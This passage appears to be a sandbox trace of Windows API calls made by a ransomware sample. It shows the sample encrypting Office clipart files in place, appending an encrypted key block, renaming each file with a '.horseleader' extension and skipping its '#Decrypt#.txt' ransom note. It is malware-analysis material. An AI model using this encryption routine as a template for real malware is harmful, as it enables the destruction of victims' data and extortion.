dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 67 [0252.715] StrStrW (lpFirst="AN01044_.WMF", lpSrch=".txt") returned 0x0 [0252.715] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1596) returned 1 [0252.715] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x63c, lpOverlapped=0x0) returned 1 [0252.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.722] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x63c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x63c, lpOverlapped=0x0) returned 1 [0252.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.722] CloseHandle (hObject=0x158) returned 1 [0252.723] GetProcessHeap () returned 0x780000 [0252.723] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.horseleader") returned 79 [0252.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.horseleader")) returned 1 [0252.724] GetProcessHeap () returned 0x780000 [0252.724] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.724] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1fda300, ftCreationTime.dwHighDateTime=0x1bd4b21, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa1fda300, ftLastWriteTime.dwHighDateTime=0x1bd4b21, nFileSizeHigh=0x0, nFileSizeLow=0x1f20, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01060_.WMF", cAlternateFileName="")) returned 1 [0252.724] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="Windows") returned -1 [0252.724] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 67 [0252.724] StrStrIW (lpFirst="AN01060_.WMF", lpSrch=".horseleader") returned 0x0 [0252.724] lstrcmpW (lpString1="AN01060_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.724] lstrcmpW (lpString1="AN01060_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.724] lstrlenW (lpString=".testttjffg") returned 11 [0252.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.724] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.727] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 67 [0252.727] StrStrW (lpFirst="AN01060_.WMF", lpSrch=".txt") returned 0x0 [0252.727] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7968) returned 1 [0252.727] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f20, lpOverlapped=0x0) returned 1 [0252.729] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe0e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.729] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f20, lpOverlapped=0x0) returned 1 [0252.729] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.729] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.729] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.729] CloseHandle (hObject=0x158) returned 1 [0252.730] GetProcessHeap () returned 0x780000 [0252.730] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.730] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.horseleader") returned 79 [0252.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.horseleader")) returned 1 [0252.731] GetProcessHeap () returned 0x780000 [0252.731] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.731] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86dd6400, ftCreationTime.dwHighDateTime=0x1bd4b1e, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86dd6400, ftLastWriteTime.dwHighDateTime=0x1bd4b1e, nFileSizeHigh=0x0, nFileSizeLow=0x728, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01084_.WMF", cAlternateFileName="")) returned 1 [0252.731] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="Windows") returned -1 [0252.731] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 67 [0252.731] StrStrIW (lpFirst="AN01084_.WMF", lpSrch=".horseleader") returned 0x0 [0252.731] lstrcmpW (lpString1="AN01084_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.731] lstrcmpW (lpString1="AN01084_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.731] lstrlenW (lpString=".testttjffg") returned 11 [0252.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.732] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 67 [0252.732] StrStrW (lpFirst="AN01084_.WMF", lpSrch=".txt") returned 0x0 [0252.732] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1832) returned 1 [0252.732] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x728, lpOverlapped=0x0) returned 1 [0252.734] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.734] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x728, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x728, lpOverlapped=0x0) returned 1 [0252.734] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.734] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.735] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.735] CloseHandle (hObject=0x158) returned 1 [0252.735] GetProcessHeap () returned 0x780000 [0252.735] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.735] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.horseleader") returned 79 [0252.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.horseleader")) returned 1 [0252.736] GetProcessHeap () returned 0x780000 [0252.736] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.736] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54406500, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54406500, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x66dc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01173_.WMF", cAlternateFileName="")) returned 1 [0252.736] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="Windows") returned -1 [0252.736] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 67 [0252.736] StrStrIW (lpFirst="AN01173_.WMF", lpSrch=".horseleader") returned 0x0 [0252.737] lstrcmpW (lpString1="AN01173_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.737] lstrcmpW (lpString1="AN01173_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.737] lstrlenW (lpString=".testttjffg") returned 11 [0252.737] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.737] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.737] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 67 [0252.739] StrStrW (lpFirst="AN01173_.WMF", lpSrch=".txt") returned 0x0 [0252.739] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=26332) returned 1 [0252.739] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.741] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.742] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.742] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x16dc, lpOverlapped=0x0) returned 1 [0252.742] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe924, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.743] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x16dc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x16dc, lpOverlapped=0x0) returned 1 [0252.743] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.743] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.743] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.743] CloseHandle (hObject=0x158) returned 1 [0252.743] GetProcessHeap () returned 0x780000 [0252.743] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.743] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.horseleader") returned 79 [0252.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.horseleader")) returned 1 [0252.744] GetProcessHeap () returned 0x780000 [0252.744] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.744] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530f3800, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x530f3800, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x6cd2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01174_.WMF", cAlternateFileName="")) returned 1 [0252.744] lstrcmpiW (lpString1="AN01174_.WMF", lpString2="Windows") returned -1 [0252.744] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 67 [0252.745] StrStrIW (lpFirst="AN01174_.WMF", lpSrch=".horseleader") returned 0x0 [0252.745] lstrcmpW (lpString1="AN01174_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.745] lstrcmpW (lpString1="AN01174_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.745] lstrlenW (lpString=".testttjffg") returned 11 [0252.745] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.745] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.745] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 67 [0252.746] StrStrW (lpFirst="AN01174_.WMF", lpSrch=".txt") returned 0x0 [0252.746] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=27858) returned 1 [0252.746] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.749] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.750] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.750] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1cd2, lpOverlapped=0x0) returned 1 [0252.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe32e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.750] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1cd2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1cd2, lpOverlapped=0x0) returned 1 [0252.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.750] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.751] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.751] CloseHandle (hObject=0x158) returned 1 [0252.751] GetProcessHeap () returned 0x780000 [0252.751] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.751] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.horseleader") returned 79 [0252.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.horseleader")) returned 1 [0252.752] GetProcessHeap () returned 0x780000 [0252.752] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.752] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbf4f00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8cbf4f00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xea2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01184_.WMF", cAlternateFileName="")) returned 1 [0252.752] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="Windows") returned -1 [0252.752] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 67 [0252.752] StrStrIW (lpFirst="AN01184_.WMF", lpSrch=".horseleader") returned 0x0 [0252.752] lstrcmpW (lpString1="AN01184_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.753] lstrcmpW (lpString1="AN01184_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.753] lstrlenW (lpString=".testttjffg") returned 11 [0252.753] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.754] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 67 [0252.754] StrStrW (lpFirst="AN01184_.WMF", lpSrch=".txt") returned 0x0 [0252.754] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3746) returned 1 [0252.754] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xea2, lpOverlapped=0x0) returned 1 [0252.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff15e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.756] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xea2, 